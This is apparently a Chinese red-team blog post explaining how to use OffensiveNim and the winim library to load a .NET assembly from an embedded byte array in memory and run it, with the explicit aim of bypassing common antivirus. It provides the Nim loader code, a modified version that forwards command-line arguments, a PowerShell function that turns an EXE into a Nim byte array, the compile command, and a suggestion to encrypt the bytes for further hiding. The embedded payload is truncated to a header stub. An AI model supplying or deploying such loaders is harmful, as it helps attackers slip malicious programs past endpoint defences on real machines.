Nim套娃加载.NET程序集

1337163122

Nim套娃加载.NET程序集 (qq.com)Nim套娃加载.NET程序集原创 RedTeamWing RedTeaming 昨天

简介使用OffensiveNim绕过常见杀软。

Start the game主要用到的库是WINIM

1. import winim/clr
   
2. import sugar
   
3. import strformat
   
4. 
   
5. # Just pops a message box... or does it? ;)
   
6. var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
   
7. 
   
8. echo "[*] Installed .NET versions"
   
9. for v in clrVersions():
   
10.     echo fmt"    \--- {v}"
    
11. echo "\n"
    
12. 
    
13. echo ""
    
14. 
    
15. var assembly = load(buf)
    
16. dump assembly
    
17. 
    
18. 
    
19. var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
    
20. assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
    
21. 
    
22. arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
    
23. assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

复制代码

作者提供了一个ps脚本将exe转为符合nim的bytes数组。

1. function CSharpToNimByteArray
   
2. {
   
3. 
   
4. Param
   
5.     (
   
6.         [string]
   
7.         $inputfile,
   
8.             [switch]
   
9.         $folder
   
10. )
    
11. 
    
12.     if ($folder)
    
13.     {
    
14.         $Files = Get-Childitem -Path $inputfile -File
    
15.         $fullname = $Files.FullName
    
16.         foreach($file in $fullname)
    
17.         {
    
18.             Write-Host "Converting $file"
    
19.             $outfile = $File + "NimByteArray.txt"
    
20.    
    
21.             [byte[]] $hex = get-content -encoding byte -path $File
    
22.             $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
    
23.             $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
    
24.             $Results = $Results + "]"         
    
25.             $Results | out-file $outfile
    
26.          
    
27.         }
    
28.         Write-Host -ForegroundColor yellow "Results Written to the same folder"
    
29.     }
    
30.     else
    
31.     {
    
32.         Write-Host "Converting $inputfile"
    
33.         $outfile = $inputfile + "NimByteArray.txt"
    
34.         
    
35.         [byte[]] $hex = get-content -encoding byte -path $inputfile
    
36.         $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
    
37.         $Results = $hexString.Insert(0,"var buf: array[" + $hex.Length + ", byte] = [byte 0x")
    
38.         $Results = $Results + "]"         
    
39.         $Results | out-file $outfile
    
40.         Write-Host "Result Written to $outfile"
    
41.     }
    
42. }

复制代码

​

体积有点大。

编译
nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nimBingo

​

体积只有800k。

​

现在还没法执行自定义参数，源码修改后如下:

1. import winim/clr
   
2. import sugar
   
3. import strformat
   
4. import os
   
5. 
   
6. # Just pops a message box... or does it? ;)
   
7. var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
   
8. 
   
9. echo "[*] Installed .NET versions"
   
10. for v in clrVersions():
    
11.     echo fmt"    \--- {v}"
    
12. echo "\n"
    
13. 
    
14. echo ""
    
15. 
    
16. var assembly = load(buf)
    
17. dump assembly
    
18. 
    
19. 
    
20. var cmd: seq[string]
    
21. var i = 1
    
22. while i <= paramCount():
    
23.     cmd.add(paramStr(i))
    
24.     inc(i)
    
25. echo cmd
    
26. var arr = toCLRVariant(cmd, VT_BSTR)
    
27. assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

复制代码

​

OJBK.
要更进一步隐藏的话，需要对字节进行加密解密。

nim感觉搞懂winim这个库就能写好多小工具了。

戳我直达原文地址

​

插播一条广告，使用语雀开了一个红队知识库的空间，免费共享。
详情地址 https://www.yuque.com/u212486/hqo6tb/rmzr1u
​